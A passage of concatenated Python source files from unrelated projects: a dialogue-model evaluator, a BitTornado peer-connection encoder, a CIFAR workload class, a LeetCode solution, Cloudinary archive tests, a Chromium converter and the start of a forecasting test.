rolls made.""" return ROLLS_MADE Neronuser/EmoCourseChat import torch import torchtext from src.models.conversational.emotion_dialogue_dataset import UTTERANCE_FIELD_NAME, RESPONSE_FIELD_NAME, \ EMOTION_FIELD_NAME from src.models.conversational.loss import NLLLoss from src.models.conversational.utils import PAD_INDEX class Evaluator(object): """Evaluate models with given datasets.""" def __init__(self, loss=NLLLoss(), batch_size=64): """Initialize the evaluator with loss and batch size. Args: loss (Optional[seq2seq.loss]): Loss to count. Defaults to seq2seq.loss.NLLLoss. batch_size (Optional[int]): Batch size. Defaults to 64. 
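        Example (hypothetical usage, assuming a trained seq2seq ``model`` and a
        ``torchtext`` dataset ``dev_data`` are available)::

            evaluator = Evaluator(batch_size=32)
            dev_loss, dev_accuracy = evaluator.evaluate(model, dev_data)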
""" self.loss = loss self.batch_size = batch_size def evaluate(self, model, data): """Evaluate a model on given dataset and return performance. Args: model (seq2seq.models): Model to evaluate. data (torchtext.data.Dataset): Dataset to evaluate against. Returns: loss (float): Loss of the given model on the given dataset. """ model.eval() loss = self.loss loss.reset() match = 0 total = 0 device = None if torch.cuda.is_available() else -1 batch_iterator = torchtext.data.BucketIterator( dataset=data, batch_size=self.batch_size, sort=True, sort_key=lambda x: len(x.src), device=device, train=False) pad = PAD_INDEX for batch in batch_iterator: input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME) target_variables = getattr(batch, RESPONSE_FIELD_NAME) decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables) # Evaluation seqlist = other['sequence'] for step, step_output in enumerate(decoder_outputs): target = target_variables[:, step + 1] loss.eval_batch(step_output.view(target_variables.size(0), -1), target) non_padding = target.ne(pad) correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0] match += correct total += non_padding.sum().data[0] if total == 0: accuracy = float('nan') else: accuracy = match / total return loss.get_loss(), accuracy class EmotionEvaluator(Evaluator): """Evaluate models with given datasets.""" def evaluate(self, model, data): """Evaluate a model on given dataset and return performance. Args: model (seq2seq.models): Model to evaluate. data (torchtext.data.Dataset): Dataset to evaluate against. Returns: loss (float): Loss of the given model on the given dataset. """ model.eval() loss = self.loss loss.reset() match = 0 total = 0 device = None if torch.cuda.is_available() else -1 batch_iterator = torchtext.data.BucketIterator( dataset=data, batch_size=self.batch_size, sort=True, sort_key=lambda x: len(x.src), device=device, train=False) pad = PAD_INDEX for batch in batch_iterator: input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME) target_variables = getattr(batch, RESPONSE_FIELD_NAME) emotion_variables = getattr(batch, EMOTION_FIELD_NAME) decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables, emotion_variables) # Evaluation seqlist = other['sequence'] for step, step_output in enumerate(decoder_outputs): target = target_variables[:, step + 1] loss.eval_batch(step_output.view(target_variables.size(0), -1), target) non_padding = target.ne(pad) correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().data[0] match += correct total += non_padding.sum().data[0] if total == 0: accuracy = float('nan') else: accuracy = match / total return loss.get_loss(), accuracy #Embedded file name: ACEStream\Core\BitTornado\BT1\Encrypter.pyo import sys from base64 import b64encode from cStringIO import StringIO from binascii import b2a_hex from socket import error as socketerror from urllib import quote from struct import unpack from time import time from traceback import print_stack from ACEStream.Core.BitTornado.BT1.MessageID import protocol_name, option_pattern from ACEStream.Core.BitTornado.BT1.convert import toint from ACEStream.Core.ProxyService.ProxyServiceUtil import * from ACEStream.Core.Utilities.logger import log, log_exc from ACEStream.GlobalConfig import globalConfig try: True except: True = 1 False = 0 DEBUG = False DEBUG_CLOSE = False DEBUG_SKIP_SOURCE_CONNECTION = False if sys.platform == 'win32': 
winvertuple = sys.getwindowsversion() spstr = winvertuple[4] if winvertuple[0] == 5 or winvertuple[0] == 6 and winvertuple[1] == 0 and spstr < 'Service Pack 2': MAX_INCOMPLETE = 8 else: MAX_INCOMPLETE = 1024 else: MAX_INCOMPLETE = 32 AUTOCLOSE_TIMEOUT = 55 def make_readable(s): if not s: return '' if quote(s).find('%') >= 0: return b2a_hex(s).upper() return '"' + s + '"' def show(s): return b2a_hex(s) class IncompleteCounter(): def __init__(self): self.c = 0 def increment(self): self.c += 1 def decrement(self): self.c -= 1 def toomany(self): return self.c >= MAX_INCOMPLETE incompletecounter = IncompleteCounter() class Connection(): def __init__(self, Encoder, connection, id, ext_handshake = False, locally_initiated = None, dns = None, coord_con = False, proxy_con = False, challenge = None, proxy_permid = None): self.Encoder = Encoder self.connection = connection self.connecter = Encoder.connecter self.id = id self.readable_id = make_readable(id) self.coord_con = coord_con self.proxy_con = proxy_con self.proxy_permid = proxy_permid self.challenge = challenge if locally_initiated is not None: self.locally_initiated = locally_initiated elif coord_con: self.locally_initiated = True elif proxy_con: self.locally_initiated = True else: self.locally_initiated = id != None self.complete = False self.keepalive = lambda : None self.closed = False self.buffer = StringIO() self.dns = dns self.support_extend_messages = False self.connecter_conn = None self.support_merklehash = False self.na_want_internal_conn_from = None self.na_address_distance = None if self.locally_initiated: incompletecounter.increment() self.create_time = time() if self.locally_initiated or ext_handshake: if DEBUG: log('Encoder.Connection::__init__: writing protname + options + infohash') self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id) if ext_handshake: if DEBUG: log('Encoder.Connection::__init__: writing my peer-ID') if coord_con: if DEBUG: log('Encoder.Connection::__init__: i am a doe, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(proxy_peer_id) else: self.connection.write(self.Encoder.my_id) if DEBUG: log('Encoder.Connection::__init__: next func = read_peer_id: ip', self.get_ip(), 'port', self.get_port()) self.next_len, self.next_func = 20, self.read_peer_id else: if DEBUG: log('Encoder.Connection::__init__: next func = read_header_len: ip', self.get_ip(), 'port', self.get_port()) self.next_len, self.next_func = 1, self.read_header_len self.Encoder.raw_server.add_task(self._auto_close, AUTOCLOSE_TIMEOUT) def get_ip(self, real = False): return self.connection.get_ip(real) def get_port(self, real = False): return self.connection.get_port(real) def get_myip(self, real = False): return self.connection.get_myip(real) def get_myport(self, real = False): return self.connection.get_myport(real) def get_id(self): return self.id def get_proxy_permid(self): return self.proxy_permid def get_readable_id(self): return self.readable_id def is_locally_initiated(self): return self.locally_initiated def is_flushed(self): return self.connection.is_flushed() def supports_merklehash(self): return self.support_merklehash def supports_extend_messages(self): return self.support_extend_messages def set_options(self, s): r = unpack('B', s[5]) if r[0] & 16: self.support_extend_messages = True if DEBUG: log('encoder::set_options: Peer supports EXTEND') if r[0] & 32: self.support_merklehash = True if DEBUG: 
log('encoder::set_options: Peer supports Merkle hashes') def read_header_len(self, s): if ord(s) != len(protocol_name): if DEBUG: log('Encoder.Connection::read_header_len: bad header len: ip', self.get_ip(), 'port', self.get_port(), 's', ord(s)) return None if DEBUG: log('Encoder.Connection::read_header_len: next func is read_header: ip', self.get_ip(), 'port', self.get_port()) return (len(protocol_name), self.read_header) def read_header(self, s): if s != protocol_name: if DEBUG: log('Encoder.Connection::read_header: bad header: ip', self.get_ip(), 'port', self.get_port(), 's', s) return None if DEBUG: log('Encoder.Connection::read_header: next func is read_reserved: ip', self.get_ip(), 'port', self.get_port()) return (8, self.read_reserved) def read_reserved(self, s): if DEBUG: log('Encoder.Connection::read_reserved: Reserved bits:', show(s)) log('Encoder.Connection::read_reserved: Reserved bits=', show(option_pattern)) self.set_options(s) if DEBUG: log('Encoder.Connection::read_reserved: next func is read_download_id: ip', self.get_ip(), 'port', self.get_port()) return (20, self.read_download_id) def read_download_id(self, s): if s != self.Encoder.download_id: return None if not self.locally_initiated: self.Encoder.connecter.external_connection_made += 1 if self.coord_con: if DEBUG: log('encoder::read_download_id: i am a proxy, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id + proxy_peer_id) else: self.connection.write(chr(len(protocol_name)) + protocol_name + option_pattern + self.Encoder.download_id + self.Encoder.my_id) if DEBUG: log('Encoder.Connection::read_download_id: next func is read_peer_id: ip', self.get_ip(), 'port', self.get_port()) return (20, self.read_peer_id) def read_peer_id(self, s): if DEBUG: log('Encoder.Connection::read_peer_id: ip', self.get_ip(), 'port', self.get_port()) if not self.id: self.id = s self.readable_id = make_readable(s) elif s != self.id: if DEBUG: log('Encoder.Connection::read_peer_id: s != self.id, returning None: ip', self.get_ip(), 'port', self.get_port()) return None self.complete = self.Encoder.got_id(self) if DEBUG: log('Encoder.Connection::read_peer_id: complete', self.complete, 'ip', self.get_ip(), 'port', self.get_port()) if not self.complete: if DEBUG: log('Encoder.Connection::read_peer_id: self not complete!!!, returning None: ip', self.get_ip(), 'port', self.get_port()) return None if self.locally_initiated: if self.coord_con: if DEBUG: log('Encoder.Connection::read_peer_id: i am a proxy, using challenge', self.challenge) proxy_peer_id = encode_challenge_in_peerid(self.Encoder.my_id, self.challenge) self.connection.write(proxy_peer_id) else: self.connection.write(self.Encoder.my_id) incompletecounter.decrement() self.Encoder._start_connection_from_queue(sched=False) c = self.Encoder.connecter.connection_made(self) self.keepalive = c.send_keepalive return (4, self.read_len) def read_len(self, s): l = toint(s) if l > self.Encoder.max_len: return None return (l, self.read_message) def read_message(self, s): if s != '': self.connecter.got_message(self, s) return (4, self.read_len) def read_dead(self, s): return None def _auto_close(self): if not self.complete: if DEBUG: log('Encoder.Connection:_auto_close: ', self.get_myip(), self.get_myport(), 'to', self.get_ip(), self.get_port()) repexer = self.Encoder.repexer if repexer and not self.closed: try: 
repexer.connection_timeout(self) except: log_exc() self.close() def close(self, closeall = False): if DEBUG: log('Encoder.Connection::close: ip', self.get_ip(), 'port', self.get_port()) if not self.closed: self.connection.close() self.sever(closeall=closeall) def sever(self, closeall = False): self.closed = True if self.Encoder.connections.has_key(self.connection): self.Encoder.admin_close(self.connection) repexer = self.Encoder.repexer if repexer and not self.complete: try: repexer.connection_closed(self) except: log_exc() if self.complete: self.connecter.connection_lost(self) elif self.locally_initiated: incompletecounter.decrement() if not closeall: self.Encoder._start_connection_from_queue(sched=False) def send_message_raw(self, message): if not self.closed: self.connection.write(message) def data_came_in(self, connection, s): self.Encoder.measurefunc(len(s)) while 1: if self.closed: return i = self.next_len - self.buffer.tell() if i > len(s): self.buffer.write(s) return self.buffer.write(s[:i]) s = s[i:] m = self.buffer.getvalue() self.buffer.reset() self.buffer.truncate() try: x = self.next_func(m) except: log_exc() self.next_len, self.next_func = 1, self.read_dead raise if x is None: if DEBUG: print >> sys.stderr, 'encoder: function failed', self.next_func self.close() return self.next_len, self.next_func = x def connection_flushed(self, connection): if self.complete: self.connecter.connection_flushed(self) def connection_lost(self, connection): if self.Encoder.connections.has_key(connection): self.sever() def is_coordinator_con(self): if self.coord_con: return True elif self.Encoder.helper is not None and self.Encoder.helper.is_coordinator_ip(self.get_ip()) and self.get_ip() != '127.0.0.1': return True else: return False def is_helper_con(self): coordinator = self.connecter.coordinator if coordinator is None: return False return coordinator.is_helper_ip(self.get_ip()) def na_set_address_distance(self): hisip = self.get_ip(real=True) myip = self.get_myip(real=True) a = hisip.split('.') b = myip.split('.') if a[0] == b[0] and a[1] == b[1] and a[2] == b[2]: if DEBUG: print >> sys.stderr, 'encoder.connection: na: Found peer on local LAN', self.get_ip() self.na_address_distance = 0 else: self.na_address_distance = 1 def na_get_address_distance(self): return self.na_address_distance class Encoder(): def __init__(self, connecter, raw_server, my_id, max_len, schedulefunc, keepalive_delay, download_id, measurefunc, config, limit_connections_queue): self.raw_server = raw_server self.connecter = connecter self.my_id = my_id self.max_len = max_len self.schedulefunc = schedulefunc self.keepalive_delay = keepalive_delay self.download_id = download_id self.measurefunc = measurefunc self.config = config self.connections = {} self.banned = {} self.to_connect = set() self.trackertime = None self.paused = False self.limit_connections_queue = limit_connections_queue if self.config['max_connections'] == 0: self.max_connections = 1073741824 else: self.max_connections = self.config['max_connections'] self.rerequest = None self.toofast_banned = {} self.helper = None self.white_list = None self.black_list = None self.app_mode = globalConfig.get_mode() if self.app_mode == 'node': self.last_source_check_time = None source_node = globalConfig.get_value('source_node') support_nodes = globalConfig.get_value('support_nodes') if not globalConfig.get_value('allow_peers_download'): self.white_list = set() if source_node is not None and globalConfig.get_value('allow_source_download'): 
self.white_list.add(source_node[0]) if len(support_nodes) and globalConfig.get_value('allow_support_download'): self.white_list.update([ addr[0] for addr in support_nodes ]) else: self.black_list = set() if source_node is not None and not globalConfig.get_value('allow_source_download'): self.black_list.add(source_node[0]) if len(support_nodes) and not globalConfig.get_value('allow_support_download'): self.black_list.update([ addr[0] for addr in support_nodes ]) if len(self.black_list) == 0: self.black_list = None if DEBUG: log('Encoder::__init__: white_list', self.white_list, 'black_list', self.black_list) schedulefunc(self.send_keepalives, keepalive_delay) self.repexer = None def send_keepalives(self): self.schedulefunc(self.send_keepalives, self.keepalive_delay) if self.paused: return for c in self.connections.values(): c.keepalive() def start_connections(self, dnsidlist): if self.rerequest is not None and self.rerequest.am_video_source: if DEBUG: log('encoder::start_connections: do not start connections for live source') return if DEBUG: log('encoder::start_connections: adding', len(dnsidlist), 'peers to queue, current len', len(self.to_connect)) wasempty = not self.to_connect self.to_connect.update(dnsidlist) if self.limit_connections_queue > 0: if DEBUG: log('encoder::start_connections: check queue limit: qlen', len(self.to_connect), 'limit', self.limit_connections_queue) while len(self.to_connect) > self.limit_connections_queue: self.to_connect.pop() if DEBUG: log('encoder::start_connections: queue limit done: qlen', len(self.to_connect), 'limit', self.limit_connections_queue) if wasempty: self.raw_server.add_task(self._start_connection_from_queue) self.trackertime = time() def _start_connection_from_queue(self, sched = True): try: force_sched = False if self.app_mode == 'node' and (self.last_source_check_time is None or time() - self.last_source_check_time > 10): try: self.last_source_check_time = time() if globalConfig.get_value('allow_source_download'): source_node = globalConfig.get_value('source_node') if source_node is not None: connected_to_source = False if len(self.connections) == 0: if DEBUG: log('encoder::_start_connection_from_queue: no connections, connect to the source:', source_node) else: if DEBUG: log('encoder::_start_connection_from_queue: check connection to the source:', source_node) for v in self.connections.values(): if v is None: continue ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::_start_connection_from_queue: check connection to the source: test ip', ip, 'port', port) if ip == source_node[0] and port == source_node[1]: connected_to_source = True if DEBUG: log('encoder::_start_connection_from_queue: got connection to the source:', source_node) break if not connected_to_source: if DEBUG: log('encoder::_start_connection_from_queue: start connection to the source:', source_node) force_sched = True self.to_connect.add((tuple(source_node), 0)) if globalConfig.get_value('allow_support_download'): support_nodes = globalConfig.get_value('support_nodes') if len(support_nodes): nodes = {} for addr in support_nodes: nodes[tuple(addr)] = False if len(self.connections) == 0: if DEBUG: log('encoder::_start_connection_from_queue: no connections, connect to support nodes:', support_nodes) else: for v in self.connections.values(): if v is None: continue ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::_start_connection_from_queue: check connection to support node: test ip', ip, 'port', port) addr = (ip, port) if addr in nodes: 
nodes[addr] = True if DEBUG: log('encoder::_start_connection_from_queue: got connection to support node:', addr) for addr, connected in nodes.iteritems(): if not connected: if DEBUG: log('encoder::_start_connection_from_queue: start connection to support node:', addr) force_sched = True self.to_connect.add((addr, 0)) except: print_exc() if not self.to_connect: return if self.connecter.external_connection_made: max_initiate = self.config['max_initiate'] else: max_initiate = int(self.config['max_initiate'] * 1.5) cons = len(self.connections) if DEBUG: log('encoder::_start_connection_from_queue: conns', cons, 'max conns', self.max_connections, 'max init', max_initiate) if cons >= self.max_connections or cons >= max_initiate: delay = 60.0 if DEBUG: log('encoder::_start_connection_from_queue: cons >= max: delay', delay) elif self.paused or incompletecounter.toomany(): delay = 1.0 if DEBUG: log('encoder::_start_connection_from_queue: paused or too many: delay', delay) else: delay = 0.0 dns, id = self.to_connect.pop() if self.white_list is not None and dns[0] not in self.white_list: if DEBUG: log('encoder::_start_connection_from_queue: peer is not in the white list: dns', dns) elif self.black_list is not None and dns[0] in self.black_list: if DEBUG: log('encoder::_start_connection_from_queue: peer is in the black list: dns', dns) else: if DEBUG: log('encoder::_start_connection_from_queue: start now: dns', dns, 'id', id) self.start_connection(dns, id) if force_sched or self.to_connect and sched: if force_sched: delay = 11.0 if DEBUG: log('encoder::_start_connection_from_queue: start_from_queue: force', force_sched, 'delay', delay) self.raw_server.add_task(self._start_connection_from_queue, delay) except: log_exc() raise def start_connection(self, dns, id, coord_con = False, proxy_con = False, forcenew = False, challenge = None, proxy_permid = None): if DEBUG: log('encoder::start_connection: start_connection:', dns) log('encoder::start_connection: start_connection: qlen', len(self.to_connect), 'nconns', len(self.connections), 'maxi', self.config['max_initiate'], 'maxc', self.config['max_connections']) if (self.paused or len(self.connections) >= self.max_connections or id == self.my_id or self.banned.has_key(dns[0])) and not forcenew: if DEBUG: print >> sys.stderr, "encoder: start_connection: we're paused or too busy" return True for v in self.connections.values(): if v is None: continue if id and v.id == id and not forcenew: if DEBUG: log('encoder::start_connection: already connected to peer', id) return True ip = v.get_ip(True) port = v.get_port(False) if DEBUG: log('encoder::start_connection: candidate', ip, port, 'want', dns[0], dns[1]) if self.config['security'] and ip != 'unknown' and ip == dns[0] and port == dns[1] and not forcenew: if DEBUG: log('encoder::start_connection: using existing', ip, 'want port', dns[1], 'existing port', port, 'id', `id`) return True try: if DEBUG: log('encoder::start_connection: Setting up new to peer', dns, 'id', `id`, 'proxy_con', proxy_con, 'challenge', challenge) c = self.raw_server.start_connection(dns) con = Connection(self, c, id, dns=dns, coord_con=coord_con, proxy_con=proxy_con, challenge=challenge, proxy_permid=proxy_permid) self.connections[c] = con c.set_handler(con) except socketerror: if DEBUG: log('encoder::start_connection: failed') return False return True def _start_connection(self, dns, id): def foo(self = self, dns = dns, id = id): self.start_connection(dns, id) self.schedulefunc(foo, 0) def got_id(self, connection): if connection.id == 
self.my_id: ret = self.connecter.na_got_loopback(connection) if DEBUG: print >> sys.stderr, 'encoder: got_id: connection to myself? keep', ret if ret == False: self.connecter.external_connection_made -= 1 return ret ip = connection.get_ip(True) port = connection.get_port(False) connection.na_set_address_distance() if self.config['security'] and self.banned.has_key(ip): if DEBUG: print >> sys.stderr, 'encoder: got_id: security ban on IP' return False for v in self.connections.values(): if connection is not v: if DEBUG: print >> sys.stderr, 'encoder: got_id: new internal conn from peer? ids', connection.id, v.id if connection.id == v.id: if DEBUG: print >> sys.stderr, 'encoder: got_id: new internal conn from peer? addrs', v.na_want_internal_conn_from, ip if v.na_want_internal_conn_from == ip: self.connecter.na_got_internal_connection(v, connection) return True if v.create_time < connection.create_time: if DEBUG: print >> sys.stderr, 'encoder: got_id: create time bad?!' return False if self.config['security'] and ip != 'unknown' and ip == v.get_ip(True) and port == v.get_port(False): if DEBUG: log('encoder::got_id: closing duplicate connection') v.close() return True def external_connection_made(self, connection): if DEBUG: log('encoder::external_connection_made: ip', connection.get_ip(), 'port', connection.get_port()) if self.paused or len(self.connections) >= self.max_connections: if DEBUG: log('encoder::external_connection_made: paused or too many: ip', connection.get_ip(), 'port', connection.get_port()) connection.close() return False con = Connection(self, connection, None) self.connections[connection] = con connection.set_handler(con) return True def externally_handshaked_connection_made(self, connection, options, msg_remainder): if DEBUG: log('encoder::externally_handshaked_connection_made: ip', connection.get_ip(), 'port', connection.get_port()) if self.paused or len(self.connections) >= self.max_connections: connection.close() return False con = Connection(self, connection, None, True) con.set_options(options) self.connections[connection] = con connection.set_handler(con) if msg_remainder: con.data_came_in(con, msg_remainder) return True def close_all(self): if DEBUG: print >> sys.stderr, 'encoder: closing all connections' copy = self.connections.values()[:] for c in copy: c.close(closeall=True) self.connections = {} def ban(self, ip): self.banned[ip] = 1 def pause(self, flag): self.paused = flag def set_helper(self, helper): self.helper = helper def set_rerequester(self, rerequest): self.rerequest = rerequest def how_many_connections(self): return len(self.connections) + len(self.to_connect) def admin_close(self, conn): del self.connections[conn] now = time() remaining_connections = len(self.connections) + len(self.to_connect) if DEBUG_CLOSE: log('Encoder::admin_close: ip', conn.get_ip(), 'port', conn.get_port(), 'remaining connections', remaining_connections) print_stack() if DEBUG_CLOSE and remaining_connections == 0 and self.trackertime and self.rerequest is not None: log('>>>encoder:admin_close: amount left', self.rerequest.amount_left(), 'is_video_source', self.rerequest.am_video_source) if remaining_connections == 0 and self.trackertime and self.rerequest is not None and not self.rerequest.am_video_source and self.rerequest.amount_left(): if self.rerequest.check_network_connection(announce=False): schedule_refresh_in = max(30, int(300 - (now - self.trackertime))) if DEBUG_CLOSE: log('Encoder::admin_close: want new peers in', schedule_refresh_in, 's') if schedule_refresh_in <= 
0: self.rerequest.encoder_wants_new_peers() else: self.raw_server.add_task(self.rerequest.encoder_wants_new_peers, schedule_refresh_in) self.trackertime = None """ Namespace package for piro plugins. """ __import__('pkg_resources').declare_namespace(__name__) 0 """Cifar workload parent class.""" import itertools from typing import Dict, Tuple import jax from algorithmic_efficiency import spec import algorithmic_efficiency.random_utils as prng class BaseCifarWorkload(spec.Workload): def __init__(self): self._eval_iters = {} self._param_shapes = None self._param_types = None def has_reached_goal(self, eval_result: float) -> bool: return eval_result['validation/accuracy'] > self.target_value @property def target_value(self): return 0.85 @property def loss_type(self): return spec.LossType.SOFTMAX_CROSS_ENTROPY @property def num_train_examples(self): return 50000 @property def num_eval_train_examples(self): return 10000 @property def num_validation_examples(self): return 10000 @property def num_test_examples(self): return 10000 @property def train_mean(self): return [0.49139968 * 255, 0.48215827 * 255, 0.44653124 * 255] @property def train_stddev(self): return [0.24703233 * 255, 0.24348505 * 255, 0.26158768 * 255] # data augmentation settings @property def scale_ratio_range(self): return (0.08, 1.0) @property def aspect_ratio_range(self): return (0.75, 4.0 / 3.0) @property def center_crop_size(self): return 32 @property def max_allowed_runtime_sec(self): return 3600 @property def eval_period_time_sec(self): return 600 def _eval_model( self, params: spec.ParameterContainer, images: spec.Tensor, labels: spec.Tensor, model_state: spec.ModelAuxiliaryState, rng: spec.RandomState) -> Tuple[spec.Tensor, spec.ModelAuxiliaryState]: """Return the summed metrics for a given batch.""" raise NotImplementedError def _eval_metric(self, logits, labels): """Return the mean accuracy and loss as a dict.""" raise NotImplementedError def _eval_model_on_split(self, split: str, num_examples: int, global_batch_size: int, params: spec.ParameterContainer, model_state: spec.ModelAuxiliaryState, rng: spec.RandomState, data_dir: str) -> Dict[str, float]: """Run a full evaluation of the model.""" data_rng, model_rng = prng.split(rng, 2) if split not in self._eval_iters: eval_iter = self.build_input_queue( data_rng, split, data_dir, global_batch_size=global_batch_size) # Note that this stores the entire eval dataset in memory. 
self._eval_iters[split] = itertools.cycle(eval_iter) total_metrics = {'accuracy': 0., 'loss': 0.} num_data = 0 num_batches = num_examples // global_batch_size for bi, batch in enumerate(self._eval_iters[split]): if bi > num_batches: break per_device_model_rngs = prng.split(model_rng, jax.local_device_count()) batch_metrics = self._eval_model(params, batch, model_state, per_device_model_rngs) total_metrics = { k: v + batch_metrics[k] for k, v in total_metrics.items() } num_data += batch_metrics['num_data'] return {k: float(v / num_data) for k, v in total_metrics.items()} def build_input_queue(self, data_rng: spec.RandomState, split: str, data_dir: str, global_batch_size: int): """Build an input queue for the given split.""" ds = self._build_dataset(data_rng, split, data_dir, global_batch_size) for batch in iter(ds): batch = jax.tree_map(lambda x: x._numpy(), batch) # pylint: disable=protected-access yield batch Priyansh2/LeetCode-Solutions # Time: O(nlogn) # Space: O(n) # greedy class Solution(object): def minimalKSum(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ result = k*(k+1)//2 curr = k+1 for x in sorted(set(nums)): if x < curr: result += curr-x curr += 1 return result # Time: O(nlogn) # Space: O(n) # greedy class Solution2(object): def minimalKSum(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ result = prev = 0 nums.append(float("inf")) for x in sorted(set(nums)): if not k: break cnt = min((x-1)-prev, k) k -= cnt result += ((prev+1)+(prev+cnt))*cnt//2 prev = x return result import tempfile import time import unittest import zipfile import certifi import cloudinary import cloudinary.poster.streaminghttp from cloudinary import uploader, utils from mock import patch import six import urllib3 from urllib3 import disable_warnings from test.helper_test import SUFFIX, TEST_IMAGE, api_response_mock, cleanup_test_resources_by_tag, UNIQUE_TEST_ID, \ get_uri, get_list_param, get_params MOCK_RESPONSE = api_response_mock() TEST_TAG = "arch_pycloudinary_test_{}".format(SUFFIX) TEST_TAG_RAW = "arch_pycloudinary_test_raw_{}".format(SUFFIX) disable_warnings() class ArchiveTest(unittest.TestCase): @classmethod def setUpClass(cls): cloudinary.reset_config() uploader.upload(TEST_IMAGE, tags=[TEST_TAG]) uploader.upload(TEST_IMAGE, tags=[TEST_TAG], transformation=dict(width=10)) @classmethod def tearDownClass(cls): cleanup_test_resources_by_tag([ (TEST_TAG,), (TEST_TAG_RAW, {'resource_type': 'raw'}), ]) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_create_archive(self): """should successfully generate an archive""" result = uploader.create_archive(tags=[TEST_TAG], target_tags=[TEST_TAG_RAW]) self.assertEqual(2, result.get("file_count")) result2 = uploader.create_zip( tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}], target_tags=[TEST_TAG_RAW]) self.assertEqual(4, result2.get("file_count")) @patch('urllib3.request.RequestMethods.request') @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_optional_parameters(self, mocker): """should allow optional parameters""" mocker.return_value = MOCK_RESPONSE expires_at = int(time.time()+3600) uploader.create_zip( tags=[TEST_TAG], expires_at=expires_at, allow_missing=True, skip_transformation_name=True, ) params = get_params(mocker.call_args[0]) self.assertEqual(params['expires_at'], expires_at) self.assertTrue(params['allow_missing']) self.assertTrue(params['skip_transformation_name']) 
@unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_archive_url(self): result = utils.download_zip_url(tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}]) http = urllib3.PoolManager( cert_reqs='CERT_REQUIRED', ca_certs=certifi.where() ) response = http.request('get', result) with tempfile.NamedTemporaryFile() as temp_file: temp_file_name = temp_file.name temp_file.write(response.data) temp_file.flush() with zipfile.ZipFile(temp_file_name, 'r') as zip_file: infos = zip_file.infolist() self.assertEqual(4, len(infos)) http.clear() @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_zip_url_options(self): result = utils.download_zip_url(tags=[TEST_TAG], transformations=[{"width": 0.5}, {"width": 2.0}], cloud_name="demo") upload_prefix = cloudinary.config().upload_prefix or "https://api.cloudinary.com" six.assertRegex(self, result, r'^{0}/v1_1/demo/.*$'.format(upload_prefix)) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_folder(self): """Should generate and return a url for downloading a folder""" # Should return url with resource_type image download_folder_url = utils.download_folder(folder_path="samples/", resource_type="image") self.assertIn("image", download_folder_url) # Should return valid url download_folder_url = utils.download_folder(folder_path="folder/") self.assertTrue(download_folder_url) self.assertIn("generate_archive", download_folder_url) # Should flatten folder download_folder_url = utils.download_folder(folder_path="folder/", flatten_folders=True) self.assertIn("flatten_folders", download_folder_url) # Should expire_at folder expiration_time = int(time.time() + 60) download_folder_url = utils.download_folder(folder_path="folder/", expires_at=expiration_time) self.assertIn("expires_at", download_folder_url) # Should use original file_name of folder download_folder_url = utils.download_folder(folder_path="folder/", use_original_filename=True) self.assertIn("use_original_filename", download_folder_url) @patch('urllib3.request.RequestMethods.request') @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_create_archive_multiple_resource_types(self, mocker): """should allow fully_qualified_public_ids""" mocker.return_value = MOCK_RESPONSE test_ids = [ "image/upload/" + UNIQUE_TEST_ID, "video/upload/" + UNIQUE_TEST_ID, "raw/upload/" + UNIQUE_TEST_ID, ] uploader.create_zip( resource_type='auto', fully_qualified_public_ids=test_ids ) args, kargs = mocker.call_args self.assertTrue(get_uri(args).endswith('/auto/generate_archive')) self.assertEqual(test_ids, get_list_param(mocker, 'fully_qualified_public_ids')) @unittest.skipUnless(cloudinary.config().api_secret, "requires api_key/api_secret") def test_download_backedup_asset(self): download_backedup_asset_url = utils.download_backedup_asset('b71b23d9c89a81a254b88a91a9dad8cd', '0e493356d8a40b856c4863c026891a4e') self.assertIn("asset_id", download_backedup_asset_url) self.assertIn("version_id", download_backedup_asset_url) if __name__ == '__main__': unittest.main() 1000+ # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import os import tracing_project import vinn def ConvertChartJson(chart_json): """Convert chart_json to Histograms. 
Args: chart_json: path to a file containing chart-json Returns: a Vinn result object whose 'returncode' indicates whether there was an exception, and whose 'stdout' contains HistogramSet json. """ return vinn.RunFile( os.path.join(os.path.dirname(__file__), 'convert_chart_json_cmdline.html'), source_paths=tracing_project.TracingProject().source_paths, js_args=[os.path.abspath(chart_json)]) 10-100 """ Author: Created on 04/12/2015 """ import unittest from argparse import Namespace from datetime import datetime from anticipy import forecast_models from anticipy.forecast import normalize_df from anticipy.forecast_models import * from anticipy.forecast_models import _fillna_wday from anticipy.model_utils import interpolate_df from anticipy.utils_test import PandasTest logger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) def logger_info(msg, data): logger.info(msg + '\n%s', data) pd.set_option('display.max_columns', 40) pd.set_option('display.max_rows', 200) pd.set_option('display.width', 1000) def get_initial_guess(f_model, t_values): return f_model(t_values, None, None, get_aic_k=False) def array_ones_in_indices(n, l_indices): return np.isin(np.arange(0, n), l_indices).astype(float) def array_zeros_in_indices(n, l_indices): return (~np.isin(np.arange(0, n), l_indices)).astype(float) def array_true_in_indices(n, l_indices): return np.isin(np.arange(0, n), l_indices) class TestForecastModel(PandasTest): def setUp(self): pass def test_model_naive(self): a_x = np.arange(0, 